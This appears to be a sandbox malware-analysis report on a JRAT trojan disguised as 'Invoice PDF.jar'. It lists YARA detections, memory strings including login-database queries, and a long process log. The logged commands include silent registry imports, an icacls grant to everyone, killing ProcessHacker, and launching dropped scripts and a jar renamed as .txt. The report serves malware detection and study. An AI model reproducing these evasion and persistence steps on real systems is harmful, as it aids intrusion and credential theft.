          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/validation
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/properties/
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/properties/(
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/properties/c
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/properties/e
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/properties/xml-string
          Source: javaw.exe, 00000009.00000003.536827543.0000000015847000.00000004.00000001.sdmpString found in binary or memory: https://github.com/xerial/sqlite-jdbc
          Source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.589242015.0000000004690000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: https://jrat.io
          Source: java.exe, 0000000A.00000002.592979586.0000000009E5B000.00000004.00000001.sdmpString found in binary or memory: https://jrat.ioS
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592945279.0000000009E32000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class, type: DROPPEDMatched rule: Detects JRAT malware Author: Florian Roth
          Source: C:\Users\user\AppData\Roaming\jhxromh.txt, type: DROPPEDMatched rule: Detects JRAT malware Author: Florian Roth
          Uses regedit.exe to modify the Windows registryShow sources
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regedit.exe 'regedit.exe' 'C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg'
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\Windows\SysWOW64\test.txtJump to behavior
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_02D638EB
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_02D5ED57
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 10_3_15362A40
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
          Source: C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class, type: DROPPEDMatched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
          Source: C:\Users\user\AppData\Roaming\jhxromh.txt, type: DROPPEDMatched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJAR@133/260@0/3
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\Users\user\bgddtomvyl.jsJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4740:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4272:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_01
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\Users\user\AppData\Local\Temp\hsperfdata_userJump to behavior
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeSection loaded: C:\Program Files (x86)\Java\jre1.8.0_211\bin\client\jvm.dll
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
          Source: C:\Windows\SysWOW64\icacls.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
          Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
          Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmpBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
          Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
          Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
          Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
          Source: javaw.exe, 00000009.00000002.590526543.0000000004C5F000.00000004.00000001.sdmpBinary or memory string: SELECT * FROM wow_logins;
          Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
          Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: javaw.exe, 00000009.00000002.590526543.0000000004C5F000.00000004.00000001.sdmpBinary or memory string: SELECT * FROM LOGINS;
          Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: Invoice PDF.jarVirustotal: Detection: 11%
          Source: javaw.exeString found in binary or memory: -addDropTarget
          Source: java.exeString found in binary or memory: mB/LoadStoreParameter
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar'' >> C:\cmdlinestart.log 2>&1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar'
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
          Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\bgddtomvyl.js
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regedit.exe 'regedit.exe' 'C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\jhxromh.txt'
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy 'C:\Program Files (x86)\Java\jre1.8.0_211' 'C:\Users\user\AppData\Roaming\Oracle\' /e
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\GYcBDbnJPA3276512531836276281.reg
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar'
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\bgddtomvyl.js
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regedit.exe 'regedit.exe' 'C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\jhxromh.txt'
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy 'C:\Program Files (x86)\Java\jre1.8.0_211' 'C:\Users\user\AppData\Roaming\Oracle\' /e
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\GYcBDbnJPA3276512531836276281.reg
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
